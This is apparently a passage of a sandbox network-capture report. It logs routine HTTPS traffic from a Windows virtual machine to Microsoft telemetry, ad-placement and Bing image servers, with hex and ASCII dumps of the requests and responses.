UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sun, 08 Dec 2024 12:31:16 GMT Connection: close
2024-12-08 12:31:16 UTC	2968	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.6	49723	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:16 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:17 UTC	471	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:16 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Sat, 07 Dec 2024 15:08:57 GMT ETag: "0x8DD16D112C941E3" x-ms-request-id: 2bf777ac-301e-0099-29dd-486683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123116Z-r1cf579d7786c2tshC1EWRr1gc000000053g0000000000ph x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:17 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-12-08 12:31:17 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-12-08 12:31:17 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-12-08 12:31:17 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-12-08 12:31:17 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-12-08 12:31:17 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-12-08 12:31:17 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-12-08 12:31:17 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-12-08 12:31:17 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-12-08 12:31:17 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.6	49725	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:18 UTC	2638	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123116Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=70e93d94502c40d5bf8c3719db3e3330&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-338387&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: cid=531174684,531174684,530725852&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AASp0AqrsC9r/xwFl+z2y2UsBJJfgRDz+895SPUhgR6pcAWcIIP2oJrW+1j3pNyTqKgRupi9+l1kJ+SvaCNMGWfE3cO1gKXxNKCEWczPo11P7s99D0mu8SGlDRLLPM9Mx0hF41kYjjomrPdDZomjT9UrkuKHyTa2lMdMuGh8DCwVmwaOHHA3EEUvZ0kds4UxJFdn7A28+lzZrl4opVyHpcs6tRluUJlzTmpHAcryi7aGuNd2Lg1eVpOSOGqEeqRw0Rx7XgSH5lttOsQd4lOIs4P1GKZE/GpqSa+tC+5pa1uv0S9Au/bTolRfZjx08hfs8hLfG289zNOES14CScPq2tMgQZgAAEELAwAzTUGUV43IS9cSUt6CwAZ5xTWQmNtlbI5yvrvYJoeDM6i2cwWhkErkXIaLcjq73TIdKjP2imZldo5PjlIxcH7jnWIrBQHB5N6oqBC/AOvAr3B9EckkAGJVnp1U8XuiOsWHmc1Svv3Vlc2+nwnIMfGB8YvtWGXBRm9soCCLXYtGi1QiDpUb6hSuyecduMUfRe3wgWg8RRTaVo9VJ4O2P0SfBiFMI3H8GL+E2SlbVob12epGXjSdveoFPe1EuNabu7NSH/abk/F1XuxAqWqreCrITO1J8F9JyOvi+5dWRtV8XTvAVcCpk/jDsuQy9IjipdZVEXDXgPxwO+TTcNSy5u/mXS/p4R7jtRGA955fu6tfG/o0Ijltx+mmBuT9iaS9kvikqQl8kYh4RIOyu7xDPAX9Rh9nGtOYwbmP4P+KXUI2aglfUThAiyek9mKSls8yNMzbH9frwIClkcwY0P4DRwz0igqszKMwQh8cTjiz5t9qMW2xf6+1Ypf30Y8nWKRSpviHkAzCcPn9jvLMCB2PdZeGEx0Dvh0u4iPjedZl7YVkLln+0417uqBSxq/zPGV+aTWsEPBKVvFTRNGVasjBYhtgB&p= Cache-Control: no-cache MS-CV: BIV/rQ3HEUi8aNLi.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-08 12:31:19 UTC	815	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 23541 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: QZp7/rV9+I4mywOh39FhbTGTB9OSsADIYxhWAieGSAszwF49Lt9FDNXBRkU+yle+pYfahkjLYu+zpTXwo1HKvsCISBCFZppYQfahTeqgphXQXA67ATc1mFx6oWanAjZ8AjZlV9Urq8pxsSvd53mW4dpq/KH7Xs8fqWboVkRs/B6YaBvmNI2ICMqjpfjbRQO3gaZzO+6nnkpX4Mk19fkLvWkLuEaovwT/HbWBPTwWT87GgcBfxbYodRBKPLBLoLIGsKv3wQebXH+FXMq9etZmiFtr5LmYF4QpC0CoXRPqnIqAjPgvrpDkWn7+/mbdF+8B8+iUYdodOkGqosc1pvFftA== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sun, 08 Dec 2024 12:31:18 GMT Connection: close
2024-12-08 12:31:19 UTC	15569	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
2024-12-08 12:31:19 UTC	7972	IN	Data Raw: 54 6b 6a 4d 6a 4d 7a 4e 7a 41 34 4d 44 59 34 4e 54 49 77 4d 7a 55 31 4e 51 3d 3d 5c 22 7d 2c 5c 22 5f 66 6c 69 67 68 74 5c 22 3a 5c 22 5c 22 7d 7d 22 7d 2c 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 Data Ascii: TkjMjMzNzA4MDY4NTIwMzU1NQ==\"},\"_flight\":\"\"}}"},{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49730	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:19 UTC	375	OUT	GET /th?id=OADD2.10239399109664_12R6JVR4SJZQSTHCV&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-08 12:31:19 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 634317 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 29A9FB66620641AEB312317C15DE9D36 Ref B: EWR30EDGE0420 Ref C: 2024-12-08T12:31:19Z Date: Sun, 08 Dec 2024 12:31:19 GMT Connection: close
2024-12-08 12:31:19 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 15 70 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 38 3a 30 36 20 30 39 3a 33 38 3a 30 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``pExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:08:06 09:38:058
